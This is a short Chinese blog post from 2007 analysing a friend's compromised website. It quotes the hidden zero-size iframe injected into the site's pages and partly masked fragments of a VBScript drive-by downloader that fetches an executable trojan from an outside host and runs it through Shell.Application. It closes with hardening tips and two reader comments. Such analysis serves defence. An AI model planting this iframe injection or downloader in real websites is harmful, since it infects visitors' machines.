群内朋友网站被挂马之分析

2007年3月12日 | 分类: 病毒分析 | 标签: , , , ,

刚快吃饭的时候群里的朋友说他的网站被挂马了,杀软进去就报毒,估计该”黑客”没有对程序进行免杀处理.该网站采用动易系统,很明显网站被入侵了.由于杀软已经报毒所以没有什么危害,闲来无事,分析一下好了
查看源文件得知被插入如下代码

<*ifra*** src=h**p://www.txdpf.org.cn/index.htm width=0 height=0>

即在正常网页插入内嵌页面,长宽都为0,这样网页打开者就不会有所察觉,前一阵的熊猫也是利用这个手法.使用VIEW命令查看h**p://www.txdpf.org.cn/index.htm源代码,发现是利用VBScript脚本命令模拟程序下载h**p://www.txdpf.org.cn/index.exe(Trojan-Downloader.VBS.Small),也就是常说的VBS,然后自动运行.执行完毕以后该页面显示你好,您所访问的页面正在加载中…请稍候片刻….其实在显示这段文字之前病毒已经下载到本机执行完毕了.部分代码如下

Rar!var Laoding=”%3Chtm*%3E%3Cscri** language%3D%22VBScri**%22%3E
on error resume next%0D%0A”;document.wri**(unescape(Laoding))

y = “h**p://www.txdpf.org.cn/index.exe”
m4=”down”
m5=”file”
m6=”copy”
m7=”exit”
Set yc = document.crea**Element(“object”)

set ye = yc.createobje**(“Shell.Applicati**”,””)
ye.ShellExecute y9,BBS,BBS,”open”,0

functi** init() { document.wri**(“你好,您所访问的页面正在加载中…请稍候片刻….”)

建议防范处理方法:
1.打上最新补丁
2.更改后台登陆地址
3.更改一个强壮的管理员密码,如:E5gt%4e8R
4.更改数据库名称
©文章版权所有,转载注明来自VipHjw[ViYaZone.Cn]

  1. 晴天
    2007年3月12日22:40

    谢谢.

  2. 2007年3月12日17:32

    其实有点低级……
    stupid是不是VBS
    怎么像JS……